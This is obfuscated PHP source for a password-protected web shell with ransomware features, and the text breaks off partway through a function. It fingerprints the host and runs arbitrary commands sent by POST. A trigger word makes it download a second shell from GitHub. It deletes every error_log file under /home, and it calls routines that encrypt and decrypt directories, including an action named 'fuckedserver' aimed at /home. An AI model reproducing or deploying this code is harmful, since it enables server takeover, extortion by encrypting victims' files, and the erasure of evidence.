<?php $ { "GLOBALS"}["pjelnudqugwazfkstuinwkkjdzggnkuyrlgubnyq"] = "aut

1. <?php $ {
2. "GLOBALS"
3. }
4. ["pjelnudqugwazfkstuinwkkjdzggnkuyrlgubnyq"] = "auth";
5. $ {
6. "GLOBALS"
7. }
8. ["grjrbieqbmhegttpqqtcqoywztnijvgnaqdnbchw"] = "_SERVER";
9. $ {
10. "GLOBALS"
11. }
12. ["kfbcuhhs_gwjnppxqp_fjjhcyf_fpovvfb"] = "ip";
13. $ {
14. "GLOBALS"
15. }
16. ["pgj_eadzgz_fjlbqimtmxm"] = "_SESSION";
17. $ {
18. "GLOBALS"
19. }
20. ["qzlhbvvvdyvyvvznsowtckjrsy"] = "_POST";
21. $ {
22. "GLOBALS"
23. }
24. ["hihdnwnkquzrovrngtyeztvym_ysjpt_l"] = "postauth";
25. $ {
26. "GLOBALS"
27. }
28. ["t_awgris_ixf__bgevbqrtj"] = "soft";
29. $ {
30. "GLOBALS"
31. }
32. ["pqlgrpcxigitz_mcgwtu_fwoy"] = "disabled_functions";
33. $ {
34. "GLOBALS"
35. }
36. ["vzcgmqa_vwtkve__ootx_ywltqdtc"] = "arr";
37. $ {
38. "GLOBALS"
39. }
40. ["szykgofh_vvdbunbvc_opu_w"] = "i";
41. $ {
42. "GLOBALS"
43. }
44. ["xzfppwppqmgxauglzsudom_"] = "check";
45. $ {
46. "GLOBALS"
47. }
48. ["_uymdxem_ljphk_wplkdbhke_scvvoq"] = "commnd";
49. $ {
50. "GLOBALS"
51. }
52. ["svwstdjmcmbpsyqhstria"] = "len";
53. $ {
54. "GLOBALS"
55. }
56. ["uwhxqondvbuny_dplnnm_z_oghzlnjtv_vtctjxt"] = "startString";
57. $ {
58. "GLOBALS"
59. }
60. ["dycfzofxkdnndfniiygyktzygkalpsg_l"] = "string";
61. $ {
62. "GLOBALS"
63. }
64. ["o_dwvtplfwzzhglz_a_iocllug"] = "sym";
65. $ {
66. "GLOBALS"
67. }
68. ["xrx__rllnajpqpkorqtsgwcmfgvu"] = "path";
69. $ {
70. "GLOBALS"
71. }
72. ["l_zh_cvqd__xquikvqpcu"] = "Dot";
73. $ {
74. "GLOBALS"
75. }
76. ["ktxpcfthgmtnmzodrvu_asz_iybivhjdfy"] = "pos";
77. $ {
78. "GLOBALS"
79. }
80. ["zatheeraznmnjimmx_yzf_g_qjztn"] = "rem";
81. $ {
82. "GLOBALS"
83. }
84. ["glckjtm_diillaoktbzlioavk_dpfyl_h"] = "rer";
85. $ {
86. "GLOBALS"
87. }
88. ["rofy_cprfjaeakdngkbgdwcjtsjaxbuowastpb"] = "out";
89. $ {
90. "GLOBALS"
91. }
92. ["xodqizfcjgbqaeqrkauxwsplr_qwvf"] = "new";
93. $ {
94. "GLOBALS"
95. }
96. ["hjfeeqemz_jxuks_taoajbewkaivtnc_n"] = "key";
97. $ {
98. "GLOBALS"
99. }
100. ["abpwntijbcbdc_yexe_hwkbeflbpi"] = "drx";
101. $ {
102. "GLOBALS"
103. }
104. ["egvixtzq_gbzpvphaygcepze_qthcsiiifi"] = "secret_key";
105. $ {
106. "GLOBALS"
107. }
108. ["wrjwd_mwuwvcdotmu_mcehsnaxkedx"] = "dir";
109. $ {
110. "GLOBALS"
111. }
112. ["zlkb_ofyjdlgs_fwxdqrnxkgoi__ekk__dx"] = "command";
113. $ {
114. "GLOBALS"
115. }
116. ["cbyfhqb_zs__e_kvueuldhkaujb_qcaxzmzt"] = "ex";
117. $ {
118. "GLOBALS"
119. }
120. ["fn_aqyiybnz_mszdpxwzikvugksyuwwwffessgkx"] = "lol";
121. $ {
122. "GLOBALS"
123. }
124. ["fe_fevwqsrki_yhygcew_skr_foxdafghqm_ol"] = "dir_path";
125. $ {
126. "GLOBALS"
127. }
128. ["uklekdehip_xag_mfvapjmnyrzf_set_vnww"] = "path_file";
129. $ {
130. "GLOBALS"
131. }
132. ["icdqgxxjzgvpcvsgwjoeykckn_cf"] = "path_info";
133. $ {
134. "GLOBALS"
135. }
136. ["obekgzafa_yyiwbgjmhttzjhidlyodmuugzma"] = "_FILES";
137. $ {
138. "GLOBALS"
139. }
140. ["hm_yphcu_dborirjhddw"] = "target_path";
141. $ {
142. "GLOBALS"
143. }
144. ["rtsbvby_oserkufxvuglps_eikqepz_mfrtdv"] = "filename";
145. $ {
146. "GLOBALS"
147. }
148. ["wyhwzqnjp_pvqkypvdqs"] = "log";
149. $ {
150. "GLOBALS"
151. }
152. ["xgdntpiu_iyzzb_rnzct"] = "lf";
153. $ {
154. "GLOBALS"
155. }
156. ["wlfqhicpv_epsibsxxosbcjjdyfi_moubv"] = "ipx";
157. $ {
158. "GLOBALS"
159. }
160. ["ibgqljrw_gl_xlvngb_mu"] = "port";
161. $ {
162. "GLOBALS"
163. }
164. ["_us__uib_lrdvpcrambknpf"] = "paap";
165. $ {
166. "GLOBALS"
167. }
168. ["fndm_spmuzxjqyxcegnnvhjqsgs_ozzx__iv_web"] = "locky";
169. $ {
170. "GLOBALS"
171. }
172. ["mgcrhqydwqgejdoomuwly"] = "em";
173. $ {
174. "GLOBALS"
175. }
176. ["gwyksdzfllpltageiee_augepxkhpaiaobbtvkf"] = "me";
177. $ {
178. "GLOBALS"
179. }
180. ["aw_l_wt_xbtknob_uit_lyomdv"] = "file";
181. $ {
182. "GLOBALS"
183. }
184. ["ov_t_emxgnkzxfdkrxbaxcmlekwir"] = "email";
185. $ {
186. "GLOBALS"
187. }
188. ["dnly_q_wva_ymoy_itftfbdftd_ifqnxqhbykqc"] = "KEY_SIZES";
189. $ {
190. "GLOBALS"
191. }
192. ["ece_fjnaz_avwardpmpdfdev_cdfmiwgl_"] = "iv_size";
193. $ {
194. "GLOBALS"
195. }
196. ["i_vxfyokcutmwjrucuasxtgamjfdwirfkwoplg_"] = "fin";
197. $ {
198. "GLOBALS"
199. }
200. ["urvoxidaqoiexasyvpogeynj_zadoggpxpftyb"] = "input_stream";
201. $ {
202. "GLOBALS"
203. }
204. ["fifcm_bgquuhqemffribjpx_kavjvioimgidnzx"] = "fc";
205. $ {
206. "GLOBALS"
207. }
208. ["ytpeogaatshhqchzqx_glijazacwxk_"] = "aes_filename";
209. $ {
210. "GLOBALS"
211. }
212. ["elanbcezwvd_gvugmayt"] = "hmac_salt";
213. $ {
214. "GLOBALS"
215. }
216. ["rpz_vawbiwdqtnroaaiotw"] = "esalt";
217. $ {
218. "GLOBALS"
219. }
220. ["aplwakanauhmuoensfmtlywllh_gskvqqsyi"] = "iv";
221. $ {
222. "GLOBALS"
223. }
224. ["dxbcwfumrjtcqxmkrkiiy__r"] = "ekey";
225. $ {
226. "GLOBALS"
227. }
228. ["g_hauhxe__odacjkenbhtyaafahing_s"] = "password";
229. $ {
230. "GLOBALS"
231. }
232. ["hqqtkcuzorpaljsxubltsvi_iyf"] = "it";
233. $ {
234. "GLOBALS"
235. }
236. ["qqg_qtzvnubrqnbupba_smbza_nphq"] = "raw";
237. $ {
238. "GLOBALS"
239. }
240. ["dvkoxuail_xttudiuupcitt"] = "opts";
241. $ {
242. "GLOBALS"
243. }
244. ["tnbj_lhaaumcpstixsbmpwcgrhozddnxy_kcgv"] = "infilesize";
245. $ {
246. "GLOBALS"
247. }
248. ["djx__dcinttzyt_xcvlifxybxi"] = "block";
249. $ {
250. "GLOBALS"
251. }
252. ["qttgubyilmzvhqqrnzicznjqbfbycticrsxwpm"] = "block_size";
253. $ {
254. "GLOBALS"
255. }
256. ["dwwxccgzvvhzzvbicdcxojwdhbwyivwkjlupm_"] = "padding";
257. $ {
258. "GLOBALS"
259. }
260. ["biorykrhsxlfn_ulxbhrufwbggvdgkz"] = "hmac_raw";
261. $ {
262. "GLOBALS"
263. }
264. ["_migjzozhzwxbldqb_jdpz_qtehtdajvd"] = "hmac_calc";
265. $ {
266. "GLOBALS"
267. }
268. ["jegsts_seesufsphrdjybttd"] = "fout";
269. $ {
270. "GLOBALS"
271. }
272. ["ljbkhjlqgtkxrnuasepozhszbmdddyzgyg"] = "out_stream";
273. $ {
274. "GLOBALS"
275. }
276. ["im_stvxkiznztfclelfxpxrxb"] = "str1";
277. $ {
278. "GLOBALS"
279. }
280. ["fguvqx_mll_duuqmd_erfvpx_ldhkf_"] = "str2";
281. $ {
282. "GLOBALS"
283. }
284. ["xawcbiswcuhnmjkvdwgf"] = "res";
285. $ {
286. "GLOBALS"
287. }
288. ["cp_ewomxatjudfecdprsa"] = "ret";
289. $ {
290. "GLOBALS"
291. }
292. ["utjrutedhaaayrrdemrwhiajvzznbcqmoijldc"] = "init";
293. $ {
294. "GLOBALS"
295. }
296. ["jikvguxksgnysvjwlzalu"] = "stream";
297. $ {
298. "GLOBALS"
299. }
300. ["lrscybayamhuscljvcwidoy"] = "hkey";
301. $ {
302. "GLOBALS"
303. }
304. ["bsfppsqrkoaidcmonsxsk"] = "hsalt";
305. $ {
306. "GLOBALS"
307. }
308. ["yuentlw_wdajszo_flkboqrh__wrwkmhralor"] = "iterations";
309. $ {
310. "GLOBALS"
311. }
312. ["ypbqnvnukfk_akxztieoirzd_wf_ifneq"] = "bucket";
313. $ {
314. "GLOBALS"
315. }
316. ["jaaj_ibfvoaqrs_cxlw_ptvxifgp"] = "in";
317. $ {
318. "GLOBALS"
319. }
320. ["xofddberhfxkeru_qazyvhkt"] = "outlen";
321. $ {
322. "GLOBALS"
323. }
324. ["_teteukpe_rrjdiuldebui"] = "consumed";
325. error_reporting(0);
326. ini_set('display_errors', 'Off');
327. session_start();
328. $ {
329. $ {
330. "GLOBALS"
331. }
332. ["pjelnudqugwazfkstuinwkkjdzggnkuyrlgubnyq"]
333. } = "f9df3cfba3a4b5cf072d303b89b02670ce846724c787ae9278518e433b96d918";
334. function getUserIpAddr() {
335. if (!empty($ {
336. $ {
337. "GLOBALS"
338. }
339. ["_SERVER"]
340. }
341. ['HTTP_CLIENT_IP'])) {
342. $ {
343. $ {
344. "GLOBALS"
345. }
346. ["ip"]
347. } = $ {
348. $ {
349. "GLOBALS"
350. }
351. ["_SERVER"]
352. }
353. ['HTTP_CLIENT_IP'];
354. } elseif (!empty($ {
355. $ {
356. "GLOBALS"
357. }
358. ["_SERVER"]
359. }
360. ['HTTP_X_FORWARDED_FOR'])) {
361. $ {
362. $ {
363. "GLOBALS"
364. }
365. ["ip"]
366. } = $ {
367. $ {
368. "GLOBALS"
369. }
370. ["_SERVER"]
371. }
372. ['HTTP_X_FORWARDED_FOR'];
373. } else {
374. $ {
375. $ {
376. "GLOBALS"
377. }
378. ["ip"]
379. } = $ {
380. $ {
381. "GLOBALS"
382. }
383. ["_SERVER"]
384. }
385. ['REMOTE_ADDR'];
386. }
387. return $ {
388. $ {
389. "GLOBALS"
390. }
391. ["ip"]
392. };
393. }
394. if (!isset($ {
395. $ {
396. "GLOBALS"
397. }
398. ["_SESSION"]
399. }
400. ["auth"]) && isset($ {
401. $ {
402. "GLOBALS"
403. }
404. ["_POST"]
405. }
406. ["auth"])) {
407. $ {
408. $ {
409. "GLOBALS"
410. }
411. ["postauth"]
412. } = str_replace("\n", "", $ {
413. $ {
414. "GLOBALS"
415. }
416. ["_POST"]
417. }
418. ["auth"]);
419. if (isset($ {
420. $ {
421. "GLOBALS"
422. }
423. ["postauth"]
424. }) && isset($ {
425. $ {
426. "GLOBALS"
427. }
428. ["auth"]
429. }) && hash('sha256', $ {
430. $ {
431. "GLOBALS"
432. }
433. ["postauth"]
434. }) == $ {
435. $ {
436. "GLOBALS"
437. }
438. ["auth"]
439. }) {
440. $ {
441. $ {
442. "GLOBALS"
443. }
444. ["_SESSION"]
445. }
446. ['auth'] = $ {
447. $ {
448. "GLOBALS"
449. }
450. ["postauth"]
451. };
452. $ {
453. $ {
454. "GLOBALS"
455. }
456. ["soft"]
457. } = $ {
458. $ {
459. "GLOBALS"
460. }
461. ["_SERVER"]
462. }
463. ['SERVER_SOFTWARE'];
464. if (startsWith($ {
465. $ {
466. "GLOBALS"
467. }
468. ["soft"]
469. }, "LiteSpeed")) {
470. echo $ {
471. $ {
472. "GLOBALS"
473. }
474. ["soft"]
475. } . " " . file_get_contents('/usr/local/lsws/VERSION');
476. } elseif (startsWith($ {
477. $ {
478. "GLOBALS"
479. }
480. ["soft"]
481. }, "Apache")) {
482. if (!function_exists('apache_get_version')) {
483. function apache_get_version() {
484. if (!isset($ {
485. $ {
486. "GLOBALS"
487. }
488. ["_SERVER"]
489. }
490. ['SERVER_SOFTWARE']) || strlen($ {
491. $ {
492. "GLOBALS"
493. }
494. ["_SERVER"]
495. }
496. ['SERVER_SOFTWARE']) == 0) {
497. return false;
498. }
499. return $ {
500. $ {
501. "GLOBALS"
502. }
503. ["_SERVER"]
504. }
505. ["SERVER_SOFTWARE"];
506. }
507. }
508. echo apache_get_version() . "\n";
509. } else {
510. echo $ {
511. $ {
512. "GLOBALS"
513. }
514. ["soft"]
515. };
516. }
517. echo php_uname() . "\n";
518. if (isset($ {
519. $ {
520. "GLOBALS"
521. }
522. ["_SERVER"]
523. }
524. ['SERVER_ADDR'])) {
525. echo "Server ip > " . $ {
526. $ {
527. "GLOBALS"
528. }
529. ["_SERVER"]
530. }
531. ['SERVER_ADDR'] . "\n";
532. }
533. echo "You ip > " . getUserIpAddr() . "\n";
534. echo "Current user > " . get_current_user() . "\n";
535. echo "OS > " . PHP_OS . "\n";
536. chechx("id");
537. $ {
538. $ {
539. "GLOBALS"
540. }
541. ["disabled_functions"]
542. } = ini_get('disable_functions');
543. if ($ {
544. $ {
545. "GLOBALS"
546. }
547. ["disabled_functions"]
548. } != '') {
549. $ {
550. $ {
551. "GLOBALS"
552. }
553. ["arr"]
554. } = explode(',', $ {
555. $ {
556. "GLOBALS"
557. }
558. ["disabled_functions"]
559. });
560. sort($ {
561. $ {
562. "GLOBALS"
563. }
564. ["arr"]
565. });
566. echo "Disabled Functions: ";
567. for ($ {
568. $ {
569. "GLOBALS"
570. }
571. ["i"]
572. } = 0;$ {
573. $ {
574. "GLOBALS"
575. }
576. ["i"]
577. } < count($ {
578. $ {
579. "GLOBALS"
580. }
581. ["arr"]
582. });$ {
583. $ {
584. "GLOBALS"
585. }
586. ["i"]
587. }
588. ++) {
589. echo " > " . $ {
590. $ {
591. "GLOBALS"
592. }
593. ["arr"]
594. }
595. [$ {
596. $ {
597. "GLOBALS"
598. }
599. ["i"]
600. }
601. ];
602. }
603. } else {
604. echo "No functions disabled";
605. }
606. if (function_exists('mcrypt_encrypt')) {
607. $ {
608. $ {
609. "GLOBALS"
610. }
611. ["check"]
612. } = "YES!";
613. echo "\nThis website can be Encrypted! :) ";
614. echo "\n" . getcwd();
615. } else {
616. $ {
617. $ {
618. "GLOBALS"
619. }
620. ["check"]
621. } = "NO!";
622. echo "\nSORRY this website can't be Encrypted! :( ";
623. echo "\n" . getcwd();
624. }
625. } else {
626. echo "wrong password!!! ";
627. echo "\n";
628. exit();
629. }
630. }
631. function chechx($commnd) {
632. if (function_exists("system")) {
633. system($ {
634. $ {
635. "GLOBALS"
636. }
637. ["commnd"]
638. }) . "\n";
639. } elseif (function_exists("exec")) {
640. exec($ {
641. $ {
642. "GLOBALS"
643. }
644. ["commnd"]
645. }) . "\n";
646. } elseif (function_exists("shell_exec")) {
647. shell_exec($ {
648. $ {
649. "GLOBALS"
650. }
651. ["commnd"]
652. }) . "\n";
653. } elseif (function_exists("passthru")) {
654. passthru($ {
655. $ {
656. "GLOBALS"
657. }
658. ["commnd"]
659. });
660. }
661. }
662. function startsWith($string, $startString) {
663. $ {
664. $ {
665. "GLOBALS"
666. }
667. ["len"]
668. } = strlen($ {
669. $ {
670. "GLOBALS"
671. }
672. ["startString"]
673. });
674. return (substr($ {
675. $ {
676. "GLOBALS"
677. }
678. ["string"]
679. }, 0, $ {
680. $ {
681. "GLOBALS"
682. }
683. ["len"]
684. }) === $ {
685. $ {
686. "GLOBALS"
687. }
688. ["startString"]
689. });
690. }
691. function setses() {
692. $ {
693. $ {
694. "GLOBALS"
695. }
696. ["_SESSION"]
697. }
698. ["path"] = getcwd();
699. }
700. if (isset($ {
701. $ {
702. "GLOBALS"
703. }
704. ["_POST"]
705. }
706. ["path"]) && isset($ {
707. $ {
708. "GLOBALS"
709. }
710. ["_SESSION"]
711. }
712. ["auth"])) {
713. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
714. $ {
715. $ {
716. "GLOBALS"
717. }
718. ["sym"]
719. } = "\\";
720. } else {
721. $ {
722. $ {
723. "GLOBALS"
724. }
725. ["sym"]
726. } = "/";
727. }
728. $ {
729. $ {
730. "GLOBALS"
731. }
732. ["path"]
733. } = $ {
734. $ {
735. "GLOBALS"
736. }
737. ["_POST"]
738. }
739. ["path"];
740. $ {
741. $ {
742. "GLOBALS"
743. }
744. ["Dot"]
745. } = "..";
746. $ {
747. $ {
748. "GLOBALS"
749. }
750. ["pos"]
751. } = strpos($ {
752. $ {
753. "GLOBALS"
754. }
755. ["path"]
756. }, $ {
757. $ {
758. "GLOBALS"
759. }
760. ["Dot"]
761. });
762. if (!isset($ {
763. $ {
764. "GLOBALS"
765. }
766. ["_SESSION"]
767. }
768. ["path"])) {
769. $ {
770. $ {
771. "GLOBALS"
772. }
773. ["_SESSION"]
774. }
775. ["path"] = getcwd();
776. } else {
777. if (startsWith($ {
778. $ {
779. "GLOBALS"
780. }
781. ["path"]
782. }, $ {
783. $ {
784. "GLOBALS"
785. }
786. ["sym"]
787. })) {
788. if ($ {
789. $ {
790. "GLOBALS"
791. }
792. ["pos"]
793. } !== false) {
794. $ {
795. $ {
796. "GLOBALS"
797. }
798. ["rem"]
799. } = explode($ {
800. $ {
801. "GLOBALS"
802. }
803. ["sym"]
804. }, $ {
805. $ {
806. "GLOBALS"
807. }
808. ["_SESSION"]
809. }
810. ["path"]);
811. $ {
812. $ {
813. "GLOBALS"
814. }
815. ["rer"]
816. } = array_pop($ {
817. $ {
818. "GLOBALS"
819. }
820. ["rem"]
821. });
822. $ {
823. $ {
824. "GLOBALS"
825. }
826. ["rer"]
827. } = array_diff($ {
828. $ {
829. "GLOBALS"
830. }
831. ["rem"]
832. }, array($ {
833. $ {
834. "GLOBALS"
835. }
836. ["rer"]
837. }));
838. $ {
839. $ {
840. "GLOBALS"
841. }
842. ["_SESSION"]
843. }
844. ["path"] = implode($ {
845. $ {
846. "GLOBALS"
847. }
848. ["sym"]
849. }, $ {
850. $ {
851. "GLOBALS"
852. }
853. ["rer"]
854. });
855. chdir($ {
856. $ {
857. "GLOBALS"
858. }
859. ["_SESSION"]
860. }
861. ["path"]);
862. echo "\n" . getcwd();
863. } elseif ($ {
864. $ {
865. "GLOBALS"
866. }
867. ["pos"]
868. } === false && isset($ {
869. $ {
870. "GLOBALS"
871. }
872. ["path"]
873. })) {
874. $ {
875. $ {
876. "GLOBALS"
877. }
878. ["path"]
879. } = str_replace("\n", "", $ {
880. $ {
881. "GLOBALS"
882. }
883. ["path"]
884. });
885. $ {
886. $ {
887. "GLOBALS"
888. }
889. ["rem"]
890. } = explode($ {
891. $ {
892. "GLOBALS"
893. }
894. ["sym"]
895. }, $ {
896. $ {
897. "GLOBALS"
898. }
899. ["_SESSION"]
900. }
901. ["path"]);
902. array_push($ {
903. $ {
904. "GLOBALS"
905. }
906. ["rem"]
907. }, $ {
908. $ {
909. "GLOBALS"
910. }
911. ["path"]
912. });
913. $ {
914. $ {
915. "GLOBALS"
916. }
917. ["_SESSION"]
918. }
919. ["path"] = implode($ {
920. $ {
921. "GLOBALS"
922. }
923. ["sym"]
924. }, $ {
925. $ {
926. "GLOBALS"
927. }
928. ["rem"]
929. });
930. if (chdir($ {
931. $ {
932. "GLOBALS"
933. }
934. ["_SESSION"]
935. }
936. ["path"])) {
937. echo "\n" . getcwd();
938. } else {
939. $ {
940. $ {
941. "GLOBALS"
942. }
943. ["rem"]
944. } = explode($ {
945. $ {
946. "GLOBALS"
947. }
948. ["sym"]
949. }, $ {
950. $ {
951. "GLOBALS"
952. }
953. ["_SESSION"]
954. }
955. ["path"]);
956. $ {
957. $ {
958. "GLOBALS"
959. }
960. ["rer"]
961. } = array_pop($ {
962. $ {
963. "GLOBALS"
964. }
965. ["rem"]
966. });
967. $ {
968. $ {
969. "GLOBALS"
970. }
971. ["rer"]
972. } = array_diff($ {
973. $ {
974. "GLOBALS"
975. }
976. ["rem"]
977. }, array($ {
978. $ {
979. "GLOBALS"
980. }
981. ["rer"]
982. }));
983. $ {
984. $ {
985. "GLOBALS"
986. }
987. ["_SESSION"]
988. }
989. ["path"] = implode($ {
990. $ {
991. "GLOBALS"
992. }
993. ["sym"]
994. }, $ {
995. $ {
996. "GLOBALS"
997. }
998. ["rer"]
999. });
1000. chdir($ {
1001. $ {
1002. "GLOBALS"
1003. }
1004. ["_SESSION"]
1005. }
1006. ["path"]);
1007. echo "\n" . getcwd();
1008. }
1009. }
1010. } else {
1011. if ($ {
1012. $ {
1013. "GLOBALS"
1014. }
1015. ["pos"]
1016. } !== false) {
1017. $ {
1018. $ {
1019. "GLOBALS"
1020. }
1021. ["rem"]
1022. } = explode($ {
1023. $ {
1024. "GLOBALS"
1025. }
1026. ["sym"]
1027. }, $ {
1028. $ {
1029. "GLOBALS"
1030. }
1031. ["_SESSION"]
1032. }
1033. ["path"]);
1034. $ {
1035. $ {
1036. "GLOBALS"
1037. }
1038. ["rer"]
1039. } = array_pop($ {
1040. $ {
1041. "GLOBALS"
1042. }
1043. ["rem"]
1044. });
1045. $ {
1046. $ {
1047. "GLOBALS"
1048. }
1049. ["rer"]
1050. } = array_diff($ {
1051. $ {
1052. "GLOBALS"
1053. }
1054. ["rem"]
1055. }, array($ {
1056. $ {
1057. "GLOBALS"
1058. }
1059. ["rer"]
1060. }));
1061. $ {
1062. $ {
1063. "GLOBALS"
1064. }
1065. ["_SESSION"]
1066. }
1067. ["path"] = implode($ {
1068. $ {
1069. "GLOBALS"
1070. }
1071. ["sym"]
1072. }, $ {
1073. $ {
1074. "GLOBALS"
1075. }
1076. ["rer"]
1077. });
1078. chdir($ {
1079. $ {
1080. "GLOBALS"
1081. }
1082. ["_SESSION"]
1083. }
1084. ["path"]);
1085. echo "\n" . getcwd();
1086. } elseif ($ {
1087. $ {
1088. "GLOBALS"
1089. }
1090. ["pos"]
1091. } === false && isset($ {
1092. $ {
1093. "GLOBALS"
1094. }
1095. ["path"]
1096. })) {
1097. $ {
1098. $ {
1099. "GLOBALS"
1100. }
1101. ["path"]
1102. } = str_replace("\n", "", $ {
1103. $ {
1104. "GLOBALS"
1105. }
1106. ["path"]
1107. });
1108. $ {
1109. $ {
1110. "GLOBALS"
1111. }
1112. ["rem"]
1113. } = explode($ {
1114. $ {
1115. "GLOBALS"
1116. }
1117. ["sym"]
1118. }, $ {
1119. $ {
1120. "GLOBALS"
1121. }
1122. ["_SESSION"]
1123. }
1124. ["path"]);
1125. array_push($ {
1126. $ {
1127. "GLOBALS"
1128. }
1129. ["rem"]
1130. }, $ {
1131. $ {
1132. "GLOBALS"
1133. }
1134. ["path"]
1135. });
1136. $ {
1137. $ {
1138. "GLOBALS"
1139. }
1140. ["_SESSION"]
1141. }
1142. ["path"] = implode($ {
1143. $ {
1144. "GLOBALS"
1145. }
1146. ["sym"]
1147. }, $ {
1148. $ {
1149. "GLOBALS"
1150. }
1151. ["rem"]
1152. });
1153. if (chdir($ {
1154. $ {
1155. "GLOBALS"
1156. }
1157. ["_SESSION"]
1158. }
1159. ["path"])) {
1160. echo "\n" . getcwd();
1161. } else {
1162. $ {
1163. $ {
1164. "GLOBALS"
1165. }
1166. ["rem"]
1167. } = explode($ {
1168. $ {
1169. "GLOBALS"
1170. }
1171. ["sym"]
1172. }, $ {
1173. $ {
1174. "GLOBALS"
1175. }
1176. ["_SESSION"]
1177. }
1178. ["path"]);
1179. $ {
1180. $ {
1181. "GLOBALS"
1182. }
1183. ["rer"]
1184. } = array_pop($ {
1185. $ {
1186. "GLOBALS"
1187. }
1188. ["rem"]
1189. });
1190. $ {
1191. $ {
1192. "GLOBALS"
1193. }
1194. ["rer"]
1195. } = array_diff($ {
1196. $ {
1197. "GLOBALS"
1198. }
1199. ["rem"]
1200. }, array($ {
1201. $ {
1202. "GLOBALS"
1203. }
1204. ["rer"]
1205. }));
1206. $ {
1207. $ {
1208. "GLOBALS"
1209. }
1210. ["_SESSION"]
1211. }
1212. ["path"] = implode($ {
1213. $ {
1214. "GLOBALS"
1215. }
1216. ["sym"]
1217. }, $ {
1218. $ {
1219. "GLOBALS"
1220. }
1221. ["rer"]
1222. });
1223. chdir($ {
1224. $ {
1225. "GLOBALS"
1226. }
1227. ["_SESSION"]
1228. }
1229. ["path"]);
1230. echo "\n" . getcwd();
1231. }
1232. }
1233. }
1234. }
1235. } else {
1236. }
1237. function clearerror() {
1238. if (function_exists("system")) {
1239. system("find /home -name 'error_log' -exec rm {} \;");
1240. echo "\n" . getcwd();
1241. } elseif (function_exists("shell_exec")) {
1242. $ {
1243. $ {
1244. "GLOBALS"
1245. }
1246. ["out"]
1247. } = shell_exec("find /home -name 'error_log' -exec rm {} \;");
1248. echo $ {
1249. $ {
1250. "GLOBALS"
1251. }
1252. ["out"]
1253. };
1254. echo "\n" . getcwd();
1255. } elseif (function_exists("exec")) {
1256. $ {
1257. $ {
1258. "GLOBALS"
1259. }
1260. ["new"]
1261. } = exec("find /home -name 'error_log' -exec rm {} \;");
1262. echo $ {
1263. $ {
1264. "GLOBALS"
1265. }
1266. ["new"]
1267. };
1268. echo "\n" . getcwd();
1269. }
1270. }
1271. if (isset($ {
1272. $ {
1273. "GLOBALS"
1274. }
1275. ["_POST"]
1276. }
1277. ["zx"]) && isset($ {
1278. $ {
1279. "GLOBALS"
1280. }
1281. ["_SESSION"]
1282. }
1283. ["auth"])) {
1284. if (isset($ {
1285. $ {
1286. "GLOBALS"
1287. }
1288. ["_SESSION"]
1289. }
1290. ["path"])) {
1291. chdir($ {
1292. $ {
1293. "GLOBALS"
1294. }
1295. ["_SESSION"]
1296. }
1297. ["path"]);
1298. runner($ {
1299. $ {
1300. "GLOBALS"
1301. }
1302. ["_POST"]
1303. }
1304. ["zx"]);
1305. } else {
1306. setses();
1307. chdir($ {
1308. $ {
1309. "GLOBALS"
1310. }
1311. ["_SESSION"]
1312. }
1313. ["path"]);
1314. runner($ {
1315. $ {
1316. "GLOBALS"
1317. }
1318. ["_POST"]
1319. }
1320. ["zx"]);
1321. }
1322. }
1323. if (isset($ {
1324. $ {
1325. "GLOBALS"
1326. }
1327. ["_POST"]
1328. }
1329. ["key"]) && isset($ {
1330. $ {
1331. "GLOBALS"
1332. }
1333. ["_SESSION"]
1334. }
1335. ["auth"])) {
1336. clearerror();
1337. $ {
1338. $ {
1339. "GLOBALS"
1340. }
1341. ["key"]
1342. } = $ {
1343. $ {
1344. "GLOBALS"
1345. }
1346. ["_POST"]
1347. }
1348. ["key"];
1349. $ {
1350. $ {
1351. "GLOBALS"
1352. }
1353. ["drx"]
1354. } = $ {
1355. $ {
1356. "GLOBALS"
1357. }
1358. ["_POST"]
1359. }
1360. ["dir"];
1361. $ {
1362. $ {
1363. "GLOBALS"
1364. }
1365. ["secret_key"]
1366. } = str_replace("\n", "", $ {
1367. $ {
1368. "GLOBALS"
1369. }
1370. ["key"]
1371. });
1372. $ {
1373. $ {
1374. "GLOBALS"
1375. }
1376. ["dir"]
1377. } = str_replace("\n", "", $ {
1378. $ {
1379. "GLOBALS"
1380. }
1381. ["drx"]
1382. });
1383. encx($ {
1384. $ {
1385. "GLOBALS"
1386. }
1387. ["secret_key"]
1388. }, $ {
1389. $ {
1390. "GLOBALS"
1391. }
1392. ["dir"]
1393. });
1394. }
1395. if (isset($ {
1396. $ {
1397. "GLOBALS"
1398. }
1399. ["_POST"]
1400. }
1401. ["dekey"]) && isset($ {
1402. $ {
1403. "GLOBALS"
1404. }
1405. ["_SESSION"]
1406. }
1407. ["auth"])) {
1408. clearerror();
1409. $ {
1410. $ {
1411. "GLOBALS"
1412. }
1413. ["key"]
1414. } = $ {
1415. $ {
1416. "GLOBALS"
1417. }
1418. ["_POST"]
1419. }
1420. ["dekey"];
1421. $ {
1422. $ {
1423. "GLOBALS"
1424. }
1425. ["drx"]
1426. } = $ {
1427. $ {
1428. "GLOBALS"
1429. }
1430. ["_POST"]
1431. }
1432. ["dir"];
1433. $ {
1434. $ {
1435. "GLOBALS"
1436. }
1437. ["secret_key"]
1438. } = str_replace("\n", "", $ {
1439. $ {
1440. "GLOBALS"
1441. }
1442. ["key"]
1443. });
1444. $ {
1445. $ {
1446. "GLOBALS"
1447. }
1448. ["dir"]
1449. } = str_replace("\n", "", $ {
1450. $ {
1451. "GLOBALS"
1452. }
1453. ["drx"]
1454. });
1455. dcry($ {
1456. $ {
1457. "GLOBALS"
1458. }
1459. ["secret_key"]
1460. }, $ {
1461. $ {
1462. "GLOBALS"
1463. }
1464. ["dir"]
1465. });
1466. }
1467. if (isset($ {
1468. $ {
1469. "GLOBALS"
1470. }
1471. ["_POST"]
1472. }
1473. ["fuckedserver"]) && isset($ {
1474. $ {
1475. "GLOBALS"
1476. }
1477. ["_SESSION"]
1478. }
1479. ["auth"])) {
1480. funk("/home");
1481. }
1482. function runner($command) {
1483. if ($ {
1484. $ {
1485. "GLOBALS"
1486. }
1487. ["command"]
1488. } == "mahakal") {
1489. system("wget https://raw.githubusercontent.com/Anon-Exploiter/Mini-Shell/master/mini_shell.php");
1490. } else {
1491. $ {
1492. $ {
1493. "GLOBALS"
1494. }
1495. ["ex"]
1496. } = $ {
1497. $ {
1498. "GLOBALS"
1499. }
1500. ["command"]
1501. };
1502. if (function_exists("system")) {
1503. system($ {
1504. $ {
1505. "GLOBALS"
1506. }
1507. ["ex"]
1508. });
